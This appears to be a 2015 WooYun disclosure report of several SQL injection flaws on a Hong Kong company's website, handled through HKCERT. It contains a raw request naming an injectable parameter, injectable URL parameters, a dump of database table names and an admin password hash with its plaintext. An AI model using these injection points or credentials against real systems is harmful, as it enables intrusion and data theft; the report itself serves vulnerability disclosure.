当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0154587

漏洞标题:活力健國際有限公司主站存在多处SQL注入(可獲取admin及用戶密碼)(香港地區)

相关厂商:活力健國際有限公司

漏洞作者: 路人甲

提交时间:2015-11-20 16:42

修复时间:2016-01-11 15:32

公开时间:2016-01-11 15:32

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(hkcert香港互联网应急协调中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-11-20: 细节已通知厂商并且等待厂商处理中
2015-11-24: 厂商已经确认,细节仅向厂商公开
2015-12-04: 细节向核心白帽子及相关领域专家公开
2015-12-14: 细节向普通白帽子公开
2015-12-24: 细节向实习白帽子公开
2016-01-11: 细节向公众公开

简要描述:

活力健國際有限公司主站存在多处SQL注入(可獲取admin及用戶密碼)

详细说明:

第一处:POST注入

POST /content/layout/product/getProoductInfo.php HTTP/1.1
Host: **.**.**.**
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://**.**.**.**/content/index.php?lang=2&lv1=8&lv2=6
Content-Length: 23
Cookie: PHPSESSID=d7vjgbferqt9idrpurmm57jeq3
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
dbTable=2036_a8_b6_c10_


3.png


第二处:http://**.**.**.**/content/index.php?lang=2&lv1=8&lv2=9
参数lv2

5.png


第三处:http://**.**.**.**/content/index.php?lang=3&lv1=9&lv2=3&lv3=3
参数lv3

4.png

漏洞证明:

current user:    'web91u1@localhost'
current database:    'web91db1'
Database: information_schema
[17 tables]
+---------------------------------------+
| CHARACTER_SETS                        |
| COLLATIONS                            |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS                               |
| COLUMN_PRIVILEGES                     |
| KEY_COLUMN_USAGE                      |
| PROFILING                             |
| ROUTINES                              |
| SCHEMATA                              |
| SCHEMA_PRIVILEGES                     |
| STATISTICS                            |
| TABLES                                |
| TABLE_CONSTRAINTS                     |
| TABLE_PRIVILEGES                      |
| TRIGGERS                              |
| USER_PRIVILEGES                       |
| VIEWS                                 |
+---------------------------------------+
Database: web91db1
[180 tables]
+---------------------------------------+
| News                                  |
| NewsNode                              |
| NewsNode_seq                          |
| Password                              |
| 2036_a10_homeNews                     |
| 2036_a10_homeProduct                  |
| 2036_a10_homeYoutube                  |
| 2036_a10_mv                           |
| 2036_a10_seo                          |
| 2036_a10_sideBanner                   |
| 2036_a10_topIcon                      |
| 2036_a10_video                        |
| 2036_a10_youtube                      |
| 2036_a13_addTextField                 |
| 2036_a1_keyVisual                     |
| 2036_a1_promotion                     |
| 2036_a1_youtubeLink                   |
| 2036_a2_addTextField                  |
| 2036_a2_keyVisual                     |
| 2036_a3_addTextField                  |
| 2036_a3_keyVisual                     |
| 2036_a3_sellSpot                      |
| 2036_a4_addTextField                  |
| 2036_a4_button                        |
| 2036_a4_caseShare                     |
| 2036_a4_keyVisual                     |
| 2036_a5_addTextField                  |
| 2036_a5_keyVisual                     |
| 2036_a5_pageImage                     |
| 2036_a5_pageTxt                       |
| 2036_a5_radioProgramme_backup         |
| 2036_a5_radioProgramme                |
| 2036_a5_topic                         |
| 2036_a6_b13_disease                   |
| 2036_a6_b14_disease                   |
| 2036_a6_b15_disease                   |
| 2036_a6_b16_disease                   |
| 2036_a6_b17_disease                   |
| 2036_a6_b18_disease                   |
| 2036_a6_b19_disease                   |
| 2036_a6_b20_disease                   |
| 2036_a6_b21_disease                   |
| 2036_a6_b22_disease                   |
| 2036_a6_b23_disease                   |
| 2036_a6_b24_disease                   |
| 2036_a6_b25_disease                   |
| 2036_a6_disease                       |
| 2036_a6_keyVisual                     |
| 2036_a6_pageImage                     |
| 2036_a6_txtPic                        |
| 2036_a7_b10_addTextField              |
| 2036_a7_b10_keyVisual                 |
| 2036_a7_b10_newsletter                |
| 2036_a7_b11_addTextField              |
| 2036_a7_b11_c14_addTextField          |
| 2036_a7_b11_c14_keyVisual             |
| 2036_a7_b11_c14_pageTxt               |
| 2036_a7_b11_contactMethod             |
| 2036_a7_b11_education                 |
| 2036_a7_b11_gender                    |
| 2036_a7_b11_keyVisual                 |
| 2036_a7_b11_occupation                |
| 2036_a7_b11_pageTxt                   |
| 2036_a7_b11_reachUs                   |
| 2036_a7_b11_referralCompany           |
| 2036_a7_b11_salary                    |
| 2036_a7_b11_symptom                   |
| 2036_a7_b12_button                    |
| 2036_a7_b12_googleMap                 |
| 2036_a7_b12_keyVisual                 |
| 2036_a7_b12_pageImage                 |
| 2036_a7_b12_pageTxt                   |
| 2036_a7_b12_txtPic                    |
| 2036_a7_b26_pageTxt                   |
| 2036_a7_b28_button                    |
| 2036_a7_b28_googleMap                 |
| 2036_a7_b28_keyVisual                 |
| 2036_a7_b28_pageImage                 |
| 2036_a7_b28_pageTxt                   |
| 2036_a7_b29_addTextField              |
| 2036_a7_b29_keyVisual                 |
| 2036_a7_b29_pageTxt                   |
| 2036_a7_b29_symptom                   |
| 2036_a7_b30_addTextField              |
| 2036_a7_b30_education                 |
| 2036_a7_b30_gender                    |
| 2036_a7_b30_keyVisual                 |
| 2036_a7_b30_pageTxt                   |
| 2036_a7_b30_symptom                   |
| 2036_a7_button                        |
| 2036_a7_keyVisual                     |
| 2036_a7_txtPic                        |
| 2036_a8_b6_c10_button                 |
| 2036_a8_b6_c10_product                |
| 2036_a8_b6_c11_button                 |
| 2036_a8_b6_c11_product                |
| 2036_a8_b6_c12_button                 |
| 2036_a8_b6_c12_product                |
| 2036_a8_b6_c13_button                 |
| 2036_a8_b6_c13_product                |
| 2036_a8_b6_c15_button                 |
| 2036_a8_b6_c15_product                |
| 2036_a8_b6_c9_button                  |
| 2036_a8_b6_c9_product                 |
| 2036_a8_b6_keyVisual                  |
| 2036_a8_b6_pageImage                  |
| 2036_a8_b6_pageTxt                    |
| 2036_a8_b7_c4_button                  |
| 2036_a8_b7_c4_product                 |
| 2036_a8_b7_c5_button                  |
| 2036_a8_b7_c5_product                 |
| 2036_a8_b7_c6_button                  |
| 2036_a8_b7_c6_product                 |
| 2036_a8_b7_c7_button                  |
| 2036_a8_b7_c7_product                 |
| 2036_a8_b7_c8_button                  |
| 2036_a8_b7_c8_product                 |
| 2036_a8_b7_keyVisual                  |
| 2036_a8_b7_pageImage                  |
| 2036_a8_b7_pageTxt                    |
| 2036_a8_b8_keyVisual                  |
| 2036_a8_b8_pageImage                  |
| 2036_a8_b8_pageTxt                    |
| 2036_a8_b8_productKnowledgeContent    |
| 2036_a8_b9_keyVisual                  |
| 2036_a8_b9_pageImage                  |
| 2036_a8_b9_promotion_backup           |
| 2036_a8_b9_promotion                  |
| 2036_a9_b1_keyVisual                  |
| 2036_a9_b1_txtPic                     |
| 2036_a9_b27_addTextField              |
| 2036_a9_b27_keyVisual                 |
| 2036_a9_b27_qualification             |
| 2036_a9_b2_addTextField               |
| 2036_a9_b2_award                      |
| 2036_a9_b2_keyVisual                  |
| 2036_a9_b2_qualification              |
| 2036_a9_b2_txtPic                     |
| 2036_a9_b3_c1_pageImage               |
| 2036_a9_b3_c1_pageTxt                 |
| 2036_a9_b3_c1_project                 |
| 2036_a9_b3_c2_pageImage               |
| 2036_a9_b3_c2_pageTxt                 |
| 2036_a9_b3_c3_d1_contentTxtPic        |
| 2036_a9_b3_c3_d2_contentTxtPic        |
| 2036_a9_b3_c3_d3_contentTxtPic        |
| 2036_a9_b3_c3_pageTxt                 |
| 2036_a9_b3_keyVisual                  |
| 2036_a9_b3_pageTxt                    |
| 2036_a9_b4_keyVisual                  |
| 2036_a9_b4_news                       |
| 2036_a9_b5_keyVisual                  |
| 2036_a9_b5_pageImageLang              |
| 2036_a9_b5_pageImage                  |
| 2036_a9_b5_pageTxt                    |
| 2036_a9_pageImageLang                 |
| 2036_a_TNC                            |
| 2036_adminEmail                       |
| 2036_admin                            |
| 2036_contentTable                     |
| 2036_footer1Lv                        |
| 2036_footerAward                      |
| 2036_footerCopyright                  |
| 2036_footerNav                        |
| 2036_footerTNC                        |
| 2036_joinClubEmail                    |
| 2036_joinHealthClubMem                |
| 2036_lang                             |
| 2036_layout                           |
| 2036_nav1Lv                           |
| 2036_nav2Lv                           |
| 2036_nav3Lv                           |
| 2036_nav4Lv                           |
| 2036_nav5Lv                           |
| 2036_picNum                           |
| 2036_topIcon                          |
| 2036_topLogo                          |
| allDate                               |
| allDay                                |
| allMonth                              |
+---------------------------------------+


Table: Password
[1 entry]
+----+------------------------------------------+-----------+---------------------+---------------------+
| id | password                                 | loginName | createDate          | lastModDate         |
+----+------------------------------------------+-----------+---------------------+---------------------+
| 1  | 21232f297a57a5a743894a0e4a801fc3 (admin) | admin     | 2009-08-29 21:10:31 | 2009-08-29 21:10:31 |
+----+------------------------------------------+-----------+---------------------+---------------------+

修复方案:

NULL

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2015-11-24 12:02

厂商回复:

Referred to related parties.

最新状态:

暂无

漏洞评价:

评价